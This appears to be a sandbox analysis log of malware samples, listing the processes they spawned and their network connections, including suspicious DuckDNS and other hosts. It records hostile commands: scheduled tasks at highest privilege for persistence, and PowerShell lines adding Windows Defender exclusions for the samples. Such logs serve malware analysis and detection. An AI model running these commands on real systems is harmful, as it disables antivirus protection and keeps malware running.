"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6380 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.0.801601407\1223845212" -parentBuildID 20221007134813 -prefsHandle 1820 -prefMapHandle 1896 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e76d4c6-c239-4eb8-9cbc-d20b3f4ffbaf} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 1980 237a66d4d58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.1.476551040\459994830" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10697464-3f5c-4cec-a697-bffa8965b57b} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 2380 2379286f558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.2.1037524358\1899594443" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 21077 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {62221e04-9319-4d50-9b5e-db1b9d322779} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 3136 237aa5a9a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.3.728584832\1924207095" -childID 2 -isForBrowser -prefsHandle 3044 -prefMapHandle 3476 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48e0ac0d-5a19-49f7-9b09-15cd90dd73c4} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 1464 237a89a3358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.4.1375529606\234741371" -childID 3 -isForBrowser -prefsHandle 4060 -prefMapHandle 4056 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {461702d8-30f2-4a2e-9d42-9d7ac336fd5d} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 4072 237a9a8e558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.5.886705527\788962339" -childID 4 -isForBrowser -prefsHandle 5044 -prefMapHandle 5060 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83e40d3a-1dda-40e3-b072-02b558eb5e4d} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 4992 237a9ca8b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.6.301338361\1095826375" -childID 5 -isForBrowser -prefsHandle 5192 -prefMapHandle 5196 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {355980e5-10da-42fd-a00f-6598d8074f2a} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 5184 237a9ca8258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.7.1178465157\55827399" -childID 6 -isForBrowser -prefsHandle 5264 -prefMapHandle 5204 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {592145ba-255e-49a6-8cb6-851692a20228} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 5256 237a9ca8858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.8.1941324830\2098535618" -childID 7 -isForBrowser -prefsHandle 5756 -prefMapHandle 5740 -prefsLen 26831 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {65120a99-d330-4244-86d8-a4fd471498b7} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 5764 237adab6458 tab

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-05\" -spe -an -ai#7zMap2270:88:7zEvent24910

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-05\" -spe -an -ai#7zMap13790:88:7zEvent9965

C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe

"C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\IEUpdater2\IEUpdater2.exe" /tn "IEUpdater2 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\IEUpdater2\IEUpdater2.exe" /tn "IEUpdater2 LG" /sc ONLOGON /rl HIGHEST

C:\ProgramData\IEUpdater2\IEUpdater2.exe

"C:\ProgramData\IEUpdater2\IEUpdater2.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.10.1320576165\849241804" -childID 8 -isForBrowser -prefsHandle 6120 -prefMapHandle 2648 -prefsLen 30267 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f235e35-6040-4dc5-9308-9fef869bf303} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 2664 23792869f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.9.1021294866\72598285" -parentBuildID 20221007134813 -prefsHandle 7092 -prefMapHandle 2716 -prefsLen 30267 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa5f90e6-3e01-43da-9322-b9d55e7e92aa} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 1472 23792869358 gpu

C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe

"C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe"

C:\Users\Admin\Downloads\2023-11-23-05\0a999f8f8064171ed32e808754c84570cdd517355a0086a8ec988c2619ea6727.exe

"C:\Users\Admin\Downloads\2023-11-23-05\0a999f8f8064171ed32e808754c84570cdd517355a0086a8ec988c2619ea6727.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-04\" -spe -an -ai#7zMap18949:88:7zEvent25410

C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe

"C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe"

C:\Users\Admin\Downloads\2023-11-23-04\8af2c945b04889ffc1c53ab93223bd6ef3a0d6cae3ddb8afb4ddd36599864dc8.exe

"C:\Users\Admin\Downloads\2023-11-23-04\8af2c945b04889ffc1c53ab93223bd6ef3a0d6cae3ddb8afb4ddd36599864dc8.exe"

C:\Users\Admin\Downloads\2023-11-23-04\9062ef0482856caa22fe235648bdd7eb8233d6b3d7482dfe7bf32c8473eaf6a3.exe

"C:\Users\Admin\Downloads\2023-11-23-04\9062ef0482856caa22fe235648bdd7eb8233d6b3d7482dfe7bf32c8473eaf6a3.exe"

C:\Users\Admin\Downloads\2023-11-23-04\e804947286d19d565add00988db1b2380207b4b1d8781ced6cc2956b65fcbe13.exe

"C:\Users\Admin\Downloads\2023-11-23-04\e804947286d19d565add00988db1b2380207b4b1d8781ced6cc2956b65fcbe13.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3724 -ip 3724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\RrzzrIaRwnI.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RrzzrIaRwnI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9CBB.tmp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6608 -ip 6608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 1424

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
CN 223.5.5.5:53 up.chromebd.com udp
US 8.8.8.8:53 5.5.5.223.in-addr.arpa udp
CN 116.62.132.139:88 up.chromebd.com tcp
US 8.8.8.8:53 139.132.62.116.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 d2vtta4ibs40qt.cloudfront.net udp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 164.15.239.18.in-addr.arpa udp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 2r5kg4.com udp
US 18.239.18.88:80 2r5kg4.com tcp
US 8.8.8.8:53 88.18.239.18.in-addr.arpa udp
US 8.8.8.8:53 d3cv8ymwoql87l.cloudfront.net udp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
US 8.8.8.8:53 198.137.222.52.in-addr.arpa udp
US 8.8.8.8:53 107.175.53.84.in-addr.arpa udp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
DE 136.243.18.118:80 www.ammyy.com tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
DE 136.243.18.118:443 www.ammyy.com tcp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 169.25.221.88.in-addr.arpa udp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 ssl.google-analytics.com udp
US 8.8.8.8:53 apis.google.com udp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.251.39.104:443 ssl.google-analytics.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
NL 142.251.39.104:443 ssl.google-analytics.com udp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 172.217.23.206:443 apis.google.com udp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 104.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
DE 172.217.23.195:443 ssl.gstatic.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 gc7pu2.com udp
US 18.154.63.14:80 gc7pu2.com tcp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
US 8.8.8.8:53 14.63.154.18.in-addr.arpa udp
US 8.8.8.8:53 98.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 d2vtta4ibs40qt.cloudfront.net udp
GB 108.138.212.54:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 54.212.138.108.in-addr.arpa udp
US 8.8.8.8:53 mbdl219.com udp
NL 65.9.86.119:443 mbdl219.com tcp
US 8.8.8.8:53 119.86.9.65.in-addr.arpa udp
US 8.8.8.8:53 14.15.239.18.in-addr.arpa udp
US 8.8.8.8:53 80.41.65.18.in-addr.arpa udp
US 204.79.197.200:443 www.bing.com tcp
US 8.8.8.8:53 ayem2390.com udp
US 18.239.36.78:443 ayem2390.com tcp
GB 108.138.212.54:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 78.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
NL 88.221.24.32:443 r.bing.com tcp
US 8.8.8.8:53 ayem2390.com udp
NL 88.221.24.82:443 r.bing.com tcp
NL 88.221.24.82:443 r.bing.com tcp
NL 88.221.24.32:443 r.bing.com tcp
US 18.239.36.96:443 ayem2390.com tcp
US 8.8.8.8:53 32.24.221.88.in-addr.arpa udp
US 8.8.8.8:53 82.24.221.88.in-addr.arpa udp
US 8.8.8.8:53 96.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 d3ce8h3h5q39ah.cloudfront.net udp
US 8.8.8.8:53 d3dwbsfzh4yjt6.cloudfront.net udp
US 18.238.248.166:443 d3dwbsfzh4yjt6.cloudfront.net tcp
NL 108.156.61.156:443 d3ce8h3h5q39ah.cloudfront.net tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 156.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 166.248.238.18.in-addr.arpa udp
IE 40.126.31.67:443 login.microsoftonline.com tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 api.mbdl219.com udp
US 18.239.36.118:443 api.mbdl219.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 118.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 18.238.248.166:443 d3dwbsfzh4yjt6.cloudfront.net tcp
NL 108.156.61.156:443 d3ce8h3h5q39ah.cloudfront.net tcp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 151.101.2.49:443 bazaar.abuse.ch tcp
US 151.101.2.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 200.179.250.142.in-addr.arpa udp
NL 88.221.24.32:443 r.bing.com tcp
US 8.8.8.8:53 phishtank.org udp
US 104.18.43.231:443 phishtank.org tcp
US 104.18.43.231:443 phishtank.org tcp
US 8.8.8.8:53 www.loggly.com udp
NL 104.99.232.200:443 www.apple.com tcp
NL 104.110.240.169:443 www.loggly.com tcp
US 8.8.8.8:53 gamestore30.emu.codes udp
US 3.230.60.21:443 gamestore30.emu.codes tcp
US 8.8.8.8:53 200.232.99.104.in-addr.arpa udp
US 8.8.8.8:53 231.43.18.104.in-addr.arpa udp
US 8.8.8.8:53 169.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 js-agent.newrelic.com udp
US 151.101.2.137:443 js-agent.newrelic.com tcp
US 8.8.8.8:53 bam.nr-data.net udp
US 162.247.243.29:443 bam.nr-data.net tcp
NL 65.9.86.119:443 mbdl219.com tcp
US 8.8.8.8:53 21.60.230.3.in-addr.arpa udp
US 8.8.8.8:53 137.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 29.243.247.162.in-addr.arpa udp
US 8.8.8.8:53 dbwcbwrm3upzo.cloudfront.net udp
US 18.239.69.21:443 dbwcbwrm3upzo.cloudfront.net tcp
US 8.8.8.8:53 play-lh.googleusercontent.com udp
US 8.8.8.8:53 21.69.239.18.in-addr.arpa udp
DE 172.217.23.214:443 play-lh.googleusercontent.com tcp
US 8.8.8.8:53 214.23.217.172.in-addr.arpa udp
DE 172.217.23.214:443 play-lh.googleusercontent.com tcp
NL 65.9.86.119:443 mbdl219.com tcp
DE 172.217.23.214:443 play-lh.googleusercontent.com tcp
US 18.238.248.166:443 d3dwbsfzh4yjt6.cloudfront.net tcp
US 8.8.8.8:53 aefd.nelreports.net udp
NL 104.97.15.59:443 aefd.nelreports.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 204.79.197.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 59.15.97.104.in-addr.arpa udp
US 8.8.8.8:53 239.197.79.204.in-addr.arpa udp
NL 65.9.86.119:443 mbdl219.com tcp
US 8.8.8.8:53 vevrever.duckdns.org udp
KR 194.126.215.10:443 vevrever.duckdns.org tcp
KR 194.126.215.10:443 vevrever.duckdns.org tcp
US 162.247.243.29:443 bam.nr-data.net tcp
KR 194.126.215.10:443 vevrever.duckdns.org tcp
US 8.8.8.8:53 10.215.126.194.in-addr.arpa udp
US 8.8.8.8:53 campolimposeguros.com.br udp
US 108.167.168.55:443 campolimposeguros.com.br tcp
US 108.167.168.55:443 campolimposeguros.com.br tcp
US 8.8.8.8:53 55.168.167.108.in-addr.arpa udp
US 108.167.168.55:443 campolimposeguros.com.br tcp
US 8.8.8.8:53 ekocay.com.tr udp
TR 95.130.170.154:80 ekocay.com.tr tcp
TR 95.130.170.154:80 ekocay.com.tr tcp
TR 95.130.170.154:80 ekocay.com.tr tcp
TR 95.130.170.154:80 ekocay.com.tr tcp
TR 95.130.170.154:80 ekocay.com.tr tcp
US 8.8.8.8:53 www.swisspass.ch udp
US 8.8.8.8:53 corporatedefenseetl.com udp
CH 193.203.121.166:443 www.swisspass.ch tcp
CH 193.203.121.166:443 www.swisspass.ch tcp
US 8.8.8.8:53 154.170.130.95.in-addr.arpa udp
US 8.8.8.8:53 166.121.203.193.in-addr.arpa udp
US 8.8.8.8:53 cdn.app.sbb.ch udp
DE 3.122.215.180:443 cdn.app.sbb.ch tcp
US 8.8.8.8:53 180.215.122.3.in-addr.arpa udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 d3dwbsfzh4yjt6.cloudfront.net udp
US 18.238.248.20:443 d3dwbsfzh4yjt6.cloudfront.net tcp
US 8.8.8.8:53 20.248.238.18.in-addr.arpa udp
US 8.8.8.8:53 d3ce8h3h5q39ah.cloudfront.net udp
NL 108.156.61.178:443 d3ce8h3h5q39ah.cloudfront.net tcp
US 8.8.8.8:53 api.mbdl219.com udp
US 18.239.36.51:443 api.mbdl219.com tcp
US 8.8.8.8:53 178.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 51.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 122.175.53.84.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
NL 88.221.24.82:443 th.bing.com tcp
NL 88.221.24.82:443 th.bing.com tcp
NL 88.221.24.82:443 th.bing.com tcp
NL 88.221.24.82:443 th.bing.com tcp
US 8.8.8.8:53 www.vx-underground.org udp
US 188.114.96.0:443 www.vx-underground.org tcp
US 188.114.96.0:443 www.vx-underground.org tcp
US 8.8.8.8:53 vx-underground.org udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
NL 108.156.61.178:443 d3ce8h3h5q39ah.cloudfront.net tcp
NL 108.156.61.178:443 d3ce8h3h5q39ah.cloudfront.net tcp
US 8.8.8.8:53 samples.vx-underground.org udp
US 172.67.136.136:443 samples.vx-underground.org tcp
US 172.67.136.136:443 samples.vx-underground.org tcp
US 8.8.8.8:53 136.136.67.172.in-addr.arpa udp
NL 108.156.61.156:443 d3ce8h3h5q39ah.cloudfront.net tcp
US 18.238.248.166:443 d3dwbsfzh4yjt6.cloudfront.net tcp
DE 136.243.104.235:443 tcp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 datalake.abuse.ch udp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:80 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 48.202.162.178.in-addr.arpa udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
N/A 127.0.0.1:59924 tcp
N/A 127.0.0.1:59931 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 44.239.75.237:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 93.243.107.34.in-addr.arpa udp
US 8.8.8.8:53 237.75.239.44.in-addr.arpa udp
US 8.8.8.8:53 datalake.abuse.ch udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 datalake.abuse.ch udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 2.18.121.73:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 73.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 216.58.208.110:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-5hne6ns6.gvt1.com udp
GB 216.58.208.110:443 redirector.gvt1.com udp
NL 209.85.226.103:443 r2---sn-5hne6ns6.gvt1.com tcp
US 8.8.8.8:53 r2.sn-5hne6ns6.gvt1.com udp
US 8.8.8.8:53 r2.sn-5hne6ns6.gvt1.com udp
NL 209.85.226.103:443 r2.sn-5hne6ns6.gvt1.com udp
US 8.8.8.8:53 103.226.85.209.in-addr.arpa udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
